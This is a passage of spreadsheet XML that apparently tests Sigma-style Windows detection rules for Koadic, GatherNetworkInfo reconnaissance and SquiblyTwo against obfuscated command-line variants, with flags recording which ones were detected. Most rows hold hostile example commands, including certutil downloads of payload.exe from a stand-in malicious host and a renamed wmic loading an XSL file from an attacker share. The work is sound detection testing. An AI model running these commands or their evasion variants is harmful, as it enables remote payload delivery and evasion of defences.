    <row r="2512" ht="15.75" customHeight="1" s="42">
      <c r="A2512" s="43" t="n"/>
      <c r="B2512" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2512" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2512" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2512" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"q" /c c^hcp 1252</t>
        </is>
      </c>
      <c r="F2512" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2512" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2512" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2512" s="44" t="n"/>
      <c r="J2512" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2512" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2513" ht="15.75" customHeight="1" s="42">
      <c r="A2513" s="43" t="n"/>
      <c r="B2513" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2513" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2513" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2513" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /Q -"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2513" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2513" s="44" t="n"/>
      <c r="J2513" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2513" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2514" ht="15.75" customHeight="1" s="42">
      <c r="A2514" s="43" t="n"/>
      <c r="B2514" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2514" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2514" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2514" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q /C c^hcp 1252</t>
        </is>
      </c>
      <c r="F2514" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2514" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2514" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2514" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2514" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2514" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2515" ht="15.75" customHeight="1" s="42">
      <c r="A2515" s="43" t="n"/>
      <c r="B2515" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2515" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2515" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2515" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"q" /"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2515" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2515" s="44" t="n"/>
      <c r="J2515" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2515" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2516" ht="15.75" customHeight="1" s="42">
      <c r="A2516" s="43" t="n"/>
      <c r="B2516" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2516" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2516" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2516" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"q" /c c^hcp 1252</t>
        </is>
      </c>
      <c r="F2516" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2516" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2516" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2516" s="43" t="n"/>
      <c r="J2516" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2516" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2517" ht="15.75" customHeight="1" s="42">
      <c r="A2517" s="43" t="n"/>
      <c r="B2517" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2517" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2517" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2517" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q -"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2517" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2517" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2517" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2517" s="43" t="n"/>
      <c r="J2517" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2517" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2518" ht="15.75" customHeight="1" s="42">
      <c r="A2518" s="43" t="n"/>
      <c r="B2518" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2518" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2518" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2518" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /q /c %x% 1252</t>
        </is>
      </c>
      <c r="F2518" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2518" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2518" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2518" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2518" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2518" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2519" ht="15.75" customHeight="1" s="42">
      <c r="A2519" s="43" t="n"/>
      <c r="B2519" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2519" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2519" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2519" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /"q" /c %x% 1252</t>
        </is>
      </c>
      <c r="F2519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2519" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2519" s="44" t="n"/>
      <c r="J2519" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2519" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2520" ht="15.75" customHeight="1" s="42">
      <c r="A2520" s="43" t="n"/>
      <c r="B2520" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2520" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2520" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2520" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /"q" -"c" %x% 1252</t>
        </is>
      </c>
      <c r="F2520" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2520" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2520" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2520" s="44" t="n"/>
      <c r="J2520" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2520" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2521" ht="15.75" customHeight="1" s="42">
      <c r="A2521" s="43" t="n"/>
      <c r="B2521" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2521" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2521" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2521" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /Q /c %x% 1252</t>
        </is>
      </c>
      <c r="F2521" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2521" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2521" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2521" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2521" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2521" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2522" ht="15.75" customHeight="1" s="42">
      <c r="A2522" s="43" t="n"/>
      <c r="B2522" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2522" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2522" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2522" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe -"q" /C %x% 1252</t>
        </is>
      </c>
      <c r="F2522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2522" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2522" s="44" t="n"/>
      <c r="J2522" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2522" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2523" ht="15.75" customHeight="1" s="42">
      <c r="A2523" s="43" t="n"/>
      <c r="B2523" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2523" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2523" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2523" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe -"q" /c %x% 1252</t>
        </is>
      </c>
      <c r="F2523" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2523" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2523" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2523" s="44" t="n"/>
      <c r="J2523" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2523" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2524" ht="15.75" customHeight="1" s="42">
      <c r="A2524" s="43" t="n"/>
      <c r="B2524" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C2524" s="44" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D2524" s="44" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E2524" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F2524" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2524" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2524" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2524" s="4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2524" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2524" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2525" ht="15.75" customHeight="1" s="42">
      <c r="A2525" s="43" t="n"/>
      <c r="B2525" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C2525" s="44" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D2525" s="44" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E2525" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F2525" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2525" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2525" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2525" s="44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2525" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2525" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2526" ht="15.75" customHeight="1" s="42">
      <c r="A2526" s="43" t="n"/>
      <c r="B2526" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C2526" s="44" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D2526" s="44" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E2526" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\network_check.vbs &amp; cscript.exe %TEMP%\network_check.vbs</t>
        </is>
      </c>
      <c r="F2526" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2526" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2526" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2526" s="4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2526" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2526" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2527" ht="15.75" customHeight="1" s="42">
      <c r="A2527" s="43" t="n"/>
      <c r="B2527" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gather_network_info</t>
        </is>
      </c>
      <c r="C2527" s="44" t="inlineStr">
        <is>
          <t>Potential Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D2527" s="44" t="inlineStr">
        <is>
          <t>575dce0c-8139-4e30-9295-1ee75969f7fe</t>
        </is>
      </c>
      <c r="E2527" s="44" t="inlineStr">
        <is>
          <t>cscript.exe C:\Windows\System32\GATHER~1.VBS</t>
        </is>
      </c>
      <c r="F2527" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2527" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2527" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2527" s="43" t="inlineStr">
        <is>
          <t>Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795); Use NTFS Short Name in Command Line (dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795)</t>
        </is>
      </c>
      <c r="J2527" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2527" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2528" ht="15.75" customHeight="1" s="42">
      <c r="A2528" s="43" t="n"/>
      <c r="B2528" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C2528" s="44" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D2528" s="44" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E2528" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\gni_recon.vbs &amp; cscript.exe %TEMP%\gni_recon.vbs</t>
        </is>
      </c>
      <c r="F2528" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2528" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2528" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2528" s="44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2528" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2528" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2529" ht="15.75" customHeight="1" s="42">
      <c r="A2529" s="43" t="n"/>
      <c r="B2529" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_gather_network_info_execution</t>
        </is>
      </c>
      <c r="C2529" s="44" t="inlineStr">
        <is>
          <t>Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS</t>
        </is>
      </c>
      <c r="D2529" s="44" t="inlineStr">
        <is>
          <t>07aa184a-870d-413d-893a-157f317f6f58</t>
        </is>
      </c>
      <c r="E2529" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C copy C:\Windows\System32\gatherNetworkInfo.vbs %TEMP%\gni_recon.vbs &amp; cscript.exe %TEMP%\gni_recon.vbs</t>
        </is>
      </c>
      <c r="F2529" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2529" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2529" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2529" s="44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2529" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2529" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2530" ht="15.75" customHeight="1" s="42">
      <c r="A2530" s="43" t="n"/>
      <c r="B2530" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2530" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2530" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2530" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2530" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2530" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2530" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2530" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2530" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2530" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2531" ht="15.75" customHeight="1" s="42">
      <c r="A2531" s="43" t="n"/>
      <c r="B2531" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2531" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2531" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2531" s="44" t="inlineStr">
        <is>
          <t>certutil -uRLCAcHE /"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2531" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2531" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2531" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2531" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2531" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2531" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2532" ht="15.75" customHeight="1" s="42">
      <c r="A2532" s="43" t="n"/>
      <c r="B2532" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2532" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2532" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2532" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2532" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2532" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2532" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2532" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2532" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2532" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2533" ht="15.75" customHeight="1" s="42">
      <c r="A2533" s="43" t="n"/>
      <c r="B2533" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2533" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2533" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2533" s="44" t="inlineStr">
        <is>
          <t>certutil -uRLcAChE -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2533" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2533" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2533" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2533" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2533" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2533" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2534" ht="15.75" customHeight="1" s="42">
      <c r="A2534" s="43" t="n"/>
      <c r="B2534" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2534" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2534" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2534" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2534" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2534" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2534" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2534" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2534" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2534" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2535" ht="15.75" customHeight="1" s="42">
      <c r="A2535" s="43" t="n"/>
      <c r="B2535" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2535" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2535" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2535" s="44" t="inlineStr">
        <is>
          <t>certutil -urlcache -sPlIt -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2535" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2535" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2535" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2535" s="44" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J2535" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2535" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2536" ht="15.75" customHeight="1" s="42">
      <c r="A2536" s="43" t="n"/>
      <c r="B2536" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2536" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2536" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2536" s="44" t="inlineStr">
        <is>
          <t>certutil -"urlcache" /"split" -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2536" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2536" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2536" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2536" s="44" t="n"/>
      <c r="J2536" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2536" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2537" ht="15.75" customHeight="1" s="42">
      <c r="A2537" s="43" t="n"/>
      <c r="B2537" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2537" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2537" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2537" s="44" t="inlineStr">
        <is>
          <t>certutil /"urlcache" -spLit -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2537" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2537" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2537" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2537" s="44" t="n"/>
      <c r="J2537" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2537" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2538" ht="15.75" customHeight="1" s="42">
      <c r="A2538" s="43" t="n"/>
      <c r="B2538" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2538" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2538" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2538" s="44" t="inlineStr">
        <is>
          <t>certutil -"urlcache" -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F2538" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2538" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2538" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2538" s="44" t="n"/>
      <c r="J2538" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2538" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2539" ht="15.75" customHeight="1" s="42">
      <c r="A2539" s="43" t="n"/>
      <c r="B2539" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C2539" s="44" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D2539" s="44" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E2539" s="44" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\wbem\wmic.exe C:\Windows\Temp\not_wmic.exe &amp;&amp; C:\Windows\Temp\not_wmic.exe /node:127.0.0.1 process list /format:"\\AttackerServer\share\evil.xsl"</t>
        </is>
      </c>
      <c r="F2539" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2539" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2539" s="44" t="b">
        <v>0</v>
